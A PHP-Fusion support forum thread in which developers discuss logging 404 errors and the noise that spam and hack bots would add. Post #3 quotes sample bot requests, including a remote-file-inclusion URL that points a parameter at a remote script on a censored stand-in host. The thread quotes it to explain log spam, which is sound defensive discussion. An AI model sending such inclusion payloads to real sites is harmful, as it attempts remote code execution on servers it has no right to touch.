Get started with PHP-Fusion

Start a New Thread

Users Participated

  • Craig
    Post made: 3
  • Basti
    Post made: 4
  • Creatium
    Post made: 1
  • JoiNNN
    Post made: 2

  1. PHP-Fusion Support Forums
  2. Development & Design
  3. Roadmap

Log 404 pages

[Development Team Access] All Roadmap items end up here for discussions.

9 Replies 2,718 Views Last Updated on 3 years ago

JoiNNN


Veteran Member

#1

Posted 3 years ago

Every time a user ends up on a 404 page should be logged, simply add a DB entry with the URL, referrer(if any) and a count of how many times was accessed.
This can be useful for debugging.

Go to roadmap item #1500

Posts: 862

Joined: 05/02/2011

Craig


Moderator

#2

Posted 3 years ago

Yup, +1 vote! Don't forget 500 internal and the others which would also be handy to log.

Posts: 4531

Joined: 27/09/2005

Basti


Moderator

#3

Posted 3 years ago

This can be useful for debugging.

Yes, but it should be Off by default.
because on live sites you will get lots of spam from spam bots / hack bots.

They will try to execute pages like this:
yoursite.de/article_id=http://spamsite.fortunecity.co.uk/index.htm?
or
yoursite.de/thread_id=154//hacksite.php?my_ms[root]=http://hacksite.co.uk/images/fx29id1.txt??

(Site Urls of spam/hack sites censored)
(I copied this from Security System 1.8.4 for v6.)

So on live site you can not do any useful debugging, because those bots will try to visit those non-existent sites every minute.
So you DB will be full with this crap spam / hack attempts.

Posts: 1103

Joined: 09/04/2007

Craig


Moderator

#4

Posted 3 years ago

Good thinking Sebastian. Good

Posts: 4531

Joined: 27/09/2005

Basti


Moderator

#5

Posted 3 years ago

thanks Cool

It would be too bad if someone invested lots of time in this feature, only to find out that it cannot fulfill its purpose, just because of the spam / hack bots.

Posts: 1103

Joined: 09/04/2007

Creatium


Moderator

#6

Posted 3 years ago

But still system can check if its a bot or not. I mean, if we are talking about google, yahoo and other bots.

Posts: 94

Joined: 14/06/2010

Basti


Moderator

#7

Posted 3 years ago

But still system can check if its a bot or not. I mean, if we are talking about google, yahoo and other bots.


No no, I am not talking about google yahoo and other "good" bots.
I am talking about spam bots and hack bots.

And when I look into the log of the security system they use normal User-Agents like this:
Mozilla/4.0
(compatible; MSIE
6.0; Windows NT 5.1;
.NET CLR 1.1.4322;
.NET CLR 2.0.50727)

Posts: 1103

Joined: 09/04/2007

Craig


Moderator

#8

Posted 3 years ago

Just needs a code to simply allow good bots and kick the rest out. No? PHP, htaccess whatever it would be a solution in a way if you know all good bots to allow then redirect the rest it's fine. No?

Posts: 4531

Joined: 27/09/2005

Basti


Moderator

#9

Posted 3 years ago

If they use a normal User-Agent like you and me, I guess, it is hard to find out who is a bot and who is not.

Posts: 1103

Joined: 09/04/2007

JoiNNN


Veteran Member

#10

Posted 3 years ago

I'd expect to have a very good bot and spammer detection and prevention system in v8 so that such things don't even come into question. Al tho some throttling can be implemented if a user or IP generates too many (404) requests.

Posts: 862

Joined: 05/02/2011

Jump to Forum:
12 users are online
0 member and 12 guests